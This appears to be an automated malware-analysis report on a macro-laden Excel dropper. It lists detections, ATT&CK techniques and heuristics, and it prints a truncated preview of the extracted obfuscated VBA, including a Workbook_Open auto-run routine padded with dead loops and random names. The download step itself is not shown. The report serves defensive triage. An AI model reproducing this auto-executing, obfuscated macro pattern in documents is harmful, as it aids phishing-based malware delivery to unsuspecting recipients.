MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, specifically a Workbook_Open macro that utilizes Shell() and CreateObject() calls. This strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-7119884-0' further supports this dropper functionality. No specific family could be identified due to the obfuscated nature of the VBA code.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-7119884-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7119884-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15429 bytes |
SHA-256: d92eda1b9119f706f89f6cf066cb269561fc608507fcababa26769abefc309c6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
nPG5KKBD.YoAljhxiQwcGdd5BXOpw
While 2 = 7545
Dim bmDFCZy6Nq5Z4bSCLED6j9FvCHkOwAfHoQluj3hHr2Sj2C As Variant
Wend
Dim MBJ2xQJtKbf As Integer
While 22 = 8684
Dim QC4xhGLIutkygaSg4Mroe3_5i_5LN75_HNRynTH As Variant
Wend
Dim sEYEQkKlYdtPfc As Integer
While 18 = 8972
Dim w_WC9McL_5xyepQGc3iD8h_wrRWadqd As Variant
Wend
Dim pXkTM4vnFoe_d As Integer
While 24 = 2119
Dim QaEdSP_zpadM4jTpyArRYFZ4TDMqMbXbcjdOL3FLpm_6FFRRa8PmwvDJ_J As Variant
Wend
Dim HOCRlMBBtSE As Integer
While 18 = 9867
Dim Dc63ekvFcvMu4OOJunpeSOAs1HWAv4_U As Variant
Wend
Dim LWdTsQJPCfW5 As Integer
While 24 = 4490
Dim dHCVBPVCwuxaKBUMuTiq1up1uzAVeMOs As Variant
Wend
Dim lxV_SmslqRJZ As Integer
While 20 = 9995
Dim hBGq57er6pCraJkJO9fheDyWnU3Fj7_gjORr As Variant
Wend
Dim rRZhrgv6tngGBh As Integer
While 6 = 3967
Dim Vquk5cLsBiCWF8oeFK22b6g8z7Q3m_wuDBjQv8Txe8O1eSYwONfU As Variant
Wend
Dim OIEZHwu7KRE As Integer
While 14 = 6072
Dim BuQS_WWrGzDUdopbegclXcad46HG8LWkK1MEL_SX1eWdJwjtbTNXrpqh As Variant
Wend
Dim RvYHNOs5bbIl As Integer
While 8 = 6524
Dim ZiNeLDu2_6SETWnm882eIovZjIIkubBr As Variant
Wend
Dim m8S2_rJn5xbVbR As Integer
While 12 = 1417
Dim xzjE7dinauvw5B3HFl4kbUDugNvMjUKY8PUSAodfH9fg_PwGt As Variant
Wend
Dim upzazyauxgrq As Integer
While 28 = 7147
Dim TCEiVymphGaFVbcyfpPZmcyoT8FZ3hK As Variant
Wend
Dim Fvyw5Z7raHaJl As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "nPG5KKBD"
Dim pxgK6T_awKx4VsFNjR8jsPsdoMGfxlbR__89Rw6d1YObHs73p_zF_PpXDBerLhmJrdxUuF6wUcsSAPU6PNzwvUQxRh5PPMQRv_sm4jGhDCtffVVvpia7qyWVL_CKJn As String
Function MrDWUlNGPPC1MYNXrKv_5SSgnhXh7xQKQKZk3r_P(lMOSD78Ekw5APJgyqwBZEfFWeoB1eX8VX5uDeHArVAlxZDAM_eeGYf2EF1xW5EjLyhlTYbShvSDD3Q7anwz93z72Co7mSmwOZY92Z)
While 10 = 5693
Dim o2zP_wRJAWk2Lt_9n2fjlaHbv9C_heUSNK_ah_hkyKnelcbgWTvYHv2MrVc As Variant
Wend
Dim AtLleBPlAnlYmS5 As Integer
While 26 = 3650
Dim tYvmzRfdpMr5JbR1rKffzkiHbTza3u4H_MAbZ_fJdNfXvFEIqv3MEwDHzm As Variant
Wend
Dim Ida_k5Riz6ZzYm As Integer
Dim Dt_cTGdc9Z6XyJtKX9A6BXY7NquXJj1jJ3rvMutuk8ZZzl4yV4XRucEoTGNlV_QXhTL6b
While 22 = 6047
Dim oTBj_JUUMosE2oBQH2kw4AsXmj_KPHr1UNhutbCnP As Variant
Wend
Dim xOuUeBlggwhMlsm As Integer
While 27 = 5950
Dim kl7cEH_D61slFPgoy7e_t7CFhanrUImse4HFeh As Variant
Wend
Dim hFsKxcuYeO_F As Integer
Dim PJTclWjwrD3q8pPIZ_ip2np8tIsot2SEv642gEDpqiGA3yFMybGBm9YlcVrbm4Bytw5AuXkT_28QeoD5BdzPtPbvfQXIWkBvgRO_3EaZ1wAtAFExRvYG
While 12 = 4420
Dim sOEm3niy5mdUrvM_FLFYIOXXUhGiTG6XqNZVl2_dgol4lVbBNuRQGi6b1q As Variant
Wend
Dim QTe_cwp_nbU As Integer
While 16 = 2715
Dim VMKl2dmcu8_ESiymOFR8d4jo8fJyMfr_pWWDEeqaxW6RNYo47Cy As Variant
Wend
Dim fIWUbmemTR As Integer
While 4 = 3200
Dim xONODY6JtfsY1HF8PYh1P1IpKzQA5Yi2 As Variant
Wend
Dim UG_GqBI_rrKe_E As Integer
While 15 = 4201
Dim RMNdU_DbB6_gDMF4OT71DrG9ONNhGgnnk_fCvYCc As Variant
Wend
Dim w2EDBI862wb As Integer
Set PJTclWjwrD3q8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.